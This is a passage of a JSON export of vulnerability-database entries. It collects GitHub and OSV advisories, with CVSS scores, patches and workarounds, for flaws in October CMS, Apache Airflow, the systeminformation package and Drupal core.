"2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2020-14864", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "github": [{"lastseen": "2023-05-27T15:15:44", "description": "### Impact\n\nAn attacker can request an account password reset and then gain access to the account using a specially crafted request.\n\n- To exploit this vulnerability, an attacker must know the username of an administrator and have access to the password reset form.\n\n### Patches\n\n- Issue has been patched in Build 472 and v1.1.5\n- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648)\n\n### Workarounds\n\nApply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade.\n\n[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here.\n\n### Recommendations\n\nWe recommend the following steps to make sure your server stays secure:\n\n- Keep server OS and system software up to date.\n- Keep October CMS software up to date.\n- Use a multi-factor authentication plugin.\n- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area.\n- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities.\n\n### References\n\nBugs found as part of Solar Security CMS Research. Credits to:\n\u2022 Andrey Basarygin\n\u2022 Andrey Guzei\n\u2022 Mikhail Khramenkov\n\u2022 Alexander Sidukov\n\u2022 Maxim Teplykh\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-30T16:13:02", "type": "github", "title": "Account Takeover in Octobercms", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2023-01-27T05:00:52", "id": "GHSA-MXR5-MC97-63RC", "href": "https://github.com/advisories/GHSA-mxr5-mc97-63rc", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-06-05T14:39:40", "description": "An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-27T16:57:33", "type": "github", "title": "Remote code execution in Apache Airflow", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": "2023-02-01T05:04:21", "id": "GHSA-RVMQ-4X66-Q7J3", "href": "https://github.com/advisories/GHSA-rvmq-4x66-q7j3", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:16:04", "description": "### Impact\ncommand injection vulnerability\n\n### Patches\nProblem was fixed with a parameter check. Please upgrade to version >= 5.3.1\n\n### Workarounds\nIf you cannot upgrade, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-16T16:51:04", "type": "github", "title": "Command Injection Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2023-02-01T05:05:06", "id": "GHSA-2M8V-572M-FF2V", "href": "https://github.com/advisories/GHSA-2m8v-572m-ff2v", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T17:18:41", "description": "\"The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-30T17:34:13", "type": "github", "title": "Authentication bypass in Apache Airflow", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2023-02-01T05:05:37", "id": "GHSA-HHX9-P69V-CX2J", "href": "https://github.com/advisories/GHSA-hhx9-p69v-cx2j", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T17:18:21", "description": "Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T16:28:25", "type": "github", "title": "Unrestricted Upload of File with Dangerous Type in Drupal core.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2023-02-01T05:06:28", "id": "GHSA-68JC-V27H-VHMW", "href": "https://github.com/advisories/GHSA-68jc-v27h-vhmw", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:15:44", "description": "### Impact\n\nAn attacker can exploit this vulnerability to bypass authentication using a specially crafted persist cookie.\n\n- To exploit this vulnerability, an attacker must obtain a Laravel\u2019s secret key for cookie encryption and signing.\n- Due to the logic of how this mechanism works, a targeted user account must be logged in while\nthe attacker is exploiting the vulnerability.\n- Authorization via persist cookie not shown in access logs.\n\n### Patches\n\n- Issue has been patched in Build 472 and v1.1.5\n- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648)\n\n### Workarounds\n\nApply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade.\n\n[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here.\n\n### Recommendations\n\nWe recommend the following steps to make sure your server stays secure:\n\n- Keep server OS and system software up to date.\n- Keep October CMS software up to date.\n- Use a multi-factor authentication plugin.\n- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area.\n- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities.\n\n### References\n\nBugs found as part of Solar Security CMS Research. Credits to:\n\u2022 Andrey Basarygin\n\u2022 Andrey Guzei\n\u2022 Mikhail Khramenkov\n\u2022 Alexander Sidukov\n\u2022 Maxim Teplykh\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-30T16:13:50", "type": "github", "title": "October CMS auth bypass and account takeover", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29487", "CVE-2021-32648"], "modified": "2023-01-29T05:02:32", "id": "GHSA-H76R-VGF3-J6W5", "href": "https://github.com/advisories/GHSA-h76r-vgf3-j6w5", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}], "osv": [{"lastseen": "2023-03-28T05:37:30", "description": "### Impact\n\nAn attacker can request an account password reset and then gain access to the account using a specially crafted request.\n\n- To exploit this vulnerability, an attacker must know the username of an administrator and have access to the password reset form.\n\n### Patches\n\n- Issue has been patched in Build 472 and v1.1.5\n- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648)\n\n### Workarounds\n\nApply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade.\n\n[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here.\n\n### Recommendations\n\nWe recommend the following steps to make sure your server stays secure:\n\n- Keep server OS and system software up to date.\n- Keep October CMS software up to date.\n- Use a multi-factor authentication plugin.\n- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area.\n- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities.\n\n### References\n\nBugs found as part of Solar Security CMS Research. Credits to:\n\u2022 Andrey Basarygin\n\u2022 Andrey Guzei\n\u2022 Mikhail Khramenkov\n\u2022 Alexander Sidukov\n\u2022 Maxim Teplykh\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-30T16:13:02", "type": "osv", "title": "Account Takeover in Octobercms", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2023-03-28T05:37:23", "id": "OSV:GHSA-MXR5-MC97-63RC", "href": "https://osv.dev/vulnerability/GHSA-mxr5-mc97-63rc", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-12T01:31:57", "description": "An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-17T00:15:00", "type": "osv", "title": "PYSEC-2020-14", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": "2020-07-22T17:15:00", "id": "OSV:PYSEC-2020-14", "href": "https://osv.dev/vulnerability/PYSEC-2020-14", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:50:01", "description": "An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-27T16:57:33", "type": "osv", "title": "Remote code execution in Apache Airflow", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": "2023-04-11T01:49:54", "id": "OSV:GHSA-RVMQ-4X66-Q7J3", "href": "https://osv.dev/vulnerability/GHSA-rvmq-4x66-q7j3", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T01:20:57", "description": "### Impact\ncommand injection vulnerability\n\n### Patches\nProblem was fixed with a parameter check. Please upgrade to version >= 5.3.1\n\n### Workarounds\nIf you cannot upgrade, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-16T16:51:04", "type": "osv", "title": "Command Injection Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-02-16T16:50:49", "id": "OSV:GHSA-2M8V-572M-FF2V", "href": "https://osv.dev/vulnerability/GHSA-2m8v-572m-ff2v", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:32:35", "description": "\"The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-30T17:34:13", "type": "osv", "title": "Authentication bypass in Apache Airflow", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2023-04-11T01:32:09", "id": "OSV:GHSA-HHX9-P69V-CX2J", "href": "https://osv.dev/vulnerability/GHSA-hhx9-p69v-cx2j", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T01:24:43", "description": "The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T16:15:00", "type": "osv", "title": "PYSEC-2020-18", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2020-11-24T17:29:00", "id": "OSV:PYSEC-2020-18", "href": "https://osv.dev/vulnerability/PYSEC-2020-18", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:41:25", "description": "Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T16:28:25", "type": "osv", "title": "Unrestricted Upload of File with Dangerous Type in Drupal core.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2023-04-11T01:41:21", "id": "OSV:GHSA-68JC-V27H-VHMW", "href": "https://osv.dev/vulnerability/GHSA-68jc-v27h-vhmw", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T05:25:23", "description": "### Impact\n\nAn attacker can exploit this vulnerability to bypass authentication using a specially crafted persist cookie.\n\n- To exploit this vulnerability, an attacker must obtain a Laravel\u2019s secret key for cookie encryption and signing.\n- Due to the logic of how this mechanism works, a targeted user account must be logged in while\nthe attacker is exploiting the vulnerability.\n- Authorization via persist cookie not shown in access logs.\n\n### Patches\n\n- Issue has been patched in Build 472 and v1.1.5\n- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648)\n\n### Workarounds\n\nApply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade.\n\n[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here.\n\n### Recommendations\n\nWe recommend the following steps to make sure your server stays secure:\n\n- Keep server OS and system software up to date.\n- Keep October CMS software up to date.\n- Use a multi-factor authentication plugin.\n- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area.\n- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities.\n\n### References\n\nBugs found as part of Solar Security CMS Research. Credits to:\n\u2022 Andrey Basarygin\n\u2022 Andrey Guzei\n\u2022 Mikhail Khramenkov\n\u2022 Alexander Sidukov\n\u2022 Maxim Teplykh\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-30T16:13:50", "type": "osv", "title": "October CMS auth bypass and account takeover", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29487", "CVE-2021-32648"], "modified": "2023-03-28T05:25:19", "id": "OSV:GHSA-H76R-VGF3-J6W5", "href": "https://osv.dev/vulnerability/GHSA-h76r-vgf3-j6w5", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-08-05T05:18:59", "description": "\nTwo 